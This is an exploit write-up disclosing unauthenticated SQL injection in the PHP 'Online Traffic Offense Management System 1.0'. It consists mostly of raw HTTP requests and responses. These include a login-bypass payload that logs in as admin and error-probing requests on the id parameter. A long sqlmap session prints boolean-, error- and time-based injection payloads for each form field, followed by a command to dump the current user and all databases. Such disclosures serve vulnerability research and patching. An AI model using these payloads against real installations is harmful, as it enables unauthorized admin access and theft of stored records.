# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated) # Date: 07/10/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: [email protected] # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html # Version: 1.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### SQL Injection # All requests can be sent by both an authenticated and a non-authenticated user # Example vulnerable pages and parameters: * http://localhost/traffic_offense/classes/Users.php Parameters: - id - firstname - lastname - username * http://localhost/traffic_offense/classes/Login.php Parameters: - username - password * http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present] Parameters: - id * http://localhost/traffic_offense/classes/Master.php Parameters: - id - date_created - ticket_no - status - offense_id - fine - code - name ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example 1 # Login request generate sql injection error POST /traffic_offense/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 30 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/login.php Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin username=xxxx'&password=xxxx2' ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Wed, 06 Oct 2021 12:31:03 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 265 Connection: close Content-Type: text/html; charset=UTF-8 <br /> <b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\classes\Login.php</b> on line <b>22</b><br /> {"status":"incorrect","last_qry":"SELECT * from users where username = 'xxxx'' and password = md5('xxxx2'') "} ----------------------------------------------------------------------------------------------------------------------- # Exploitable request - login parameter can be any value POST /traffic_offense/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 47 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/login.php Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin username=admin&password=xxxx')+or+'1'='1'+and+('1 ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Wed, 06 Oct 2021 12:24:50 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} ----------------------------------------------------------------------------------------------------------------------- Logged as admin account ----------------------------------------------------------------------------------------------------------------------- ## Example 2 # Sql injection detection on the example of pages with the id parameter # Login request generate sql error - add ' next to the id parameter GET /traffic_offense/admin/offenses/view_details.php?id=3' HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin #Response from database - sql error HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 03:56:37 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 7837 Connection: close Content-Type: text/html; charset=UTF-8 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''3''' at line 1 SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '3'' <br /> <b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>10</b><br /> <br /> <b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>16</b> [...] # Request - add '' next to the id parameter GET /traffic_offense/admin/offenses/view_details.php?id=3'' HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin # Response did not return an error - sql injection confirmed HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 03:58:40 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 7214 Connection: close Content-Type: text/html; charset=UTF-8 <div class="container-fluid"> <div class="w-100 d-flex justify-content-end mb-2"> <button class="btn btn-flat btn-sm btn-default bg-lightblue" type="button" id="print"><i class="fa fa-print"></i> Print</button> <button class="btn btn-flat btn-sm btn-default bg-black" data-dismiss="modal"><i class="fa fa-times"></i> Close</button> </div> [...] ----------------------------------------------------------------------------------------------------------------------- ## Example 3 # Using sqlmap on an intercepted request http://localhost/traffic_offense/classes/Master.php POST /traffic_offense/classes/Master.php?f=save_offense_record HTTP/1.1 Origin: http://localhost Content-Length: 1598 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Sec-Fetch-Site: same-origin Host: localhost:80 Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Connection: close X-Requested-With: XMLHttpRequest Sec-Fetch-Mode: cors Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7 Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record&id=1 Content-Type: multipart/form-data; boundary=---------------------------7900788429998101281579901385 Sec-Fetch-Dest: empty -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1* -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00* -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1* -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1* -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652* -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3* -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001* -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- # Using the sqlmap utility C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 --dbms=MySQL -r C:\Users\Hubert\Desktop\0day\sql2 --proxy=http://127.0.0.1:8090 ___ __H__ ___ ___[']_____ ___ ___ {1.5.9.6#dev} |_ -| . [)] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 05:52:47 /2021-10-07/ [05:52:47] [INFO] parsing HTTP request from 'C:\Users\Hubert\Desktop\0day\sql2' custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Multipart-like data found in POST body. Do you want to process it? [Y/n/q] [05:52:51] [INFO] testing connection to the target URL [...] --- Parameter: MULTIPART #4* ((custom) POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652' RLIKE (SELECT (CASE WHEN (8015=8015) THEN '' ELSE 0x28 END)) AND 'howi'='howi -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652' AND (SELECT 4940 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(4940=4940,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zvbh'='zvbh -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652' AND (SELECT 7241 FROM (SELECT(SLEEP(5)))rEqK) AND 'CONm'='CONm -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Parameter: MULTIPART #5* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3' AND 4015=4015 AND 'mPLR'='mPLR -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3' AND (SELECT 6830 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6830=6830,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pbeA'='pbeA -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3' AND (SELECT 5446 FROM (SELECT(SLEEP(5)))QMKi) AND 'GfhC'='GfhC -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Parameter: MULTIPART #6* ((custom) POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001' RLIKE (SELECT (CASE WHEN (7186=7186) THEN '' ELSE 0x28 END)) AND 'rwJI'='rwJI -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001' AND (SELECT 2971 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(2971=2971,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OeqR'='OeqR -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001' AND (SELECT 5527 FROM (SELECT(SLEEP(5)))GfWJ) AND 'GtGB'='GtGB -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Parameter: MULTIPART #2* ((custom) POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1' RLIKE (SELECT (CASE WHEN (8485=8485) THEN '' ELSE 0x28 END)) AND 'CyNe'='CyNe -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6653=6653,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tCsu'='tCsu -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1' AND (SELECT 6178 FROM (SELECT(SLEEP(5)))CQxQ) AND 'MljD'='MljD -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Parameter: MULTIPART #3* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1' AND 5855=5855 AND 'broT'='broT -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1' AND (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(9644=9644,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zaBh'='zaBh -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1' AND (SELECT 4422 FROM (SELECT(SLEEP(5)))wQes) AND 'GuRX'='GuRX -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- [...] # Dump user, used database, all databases on the server using sqlmap C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 -r C:\Users\Hubert\Desktop\0day\sql2 --dbms=MySQL --current-user --current-db --dbs --batch [...] [06:06:23] [INFO] testing MySQL [06:06:23] [INFO] confirming MySQL [06:06:24] [WARNING] reflective value(s) found 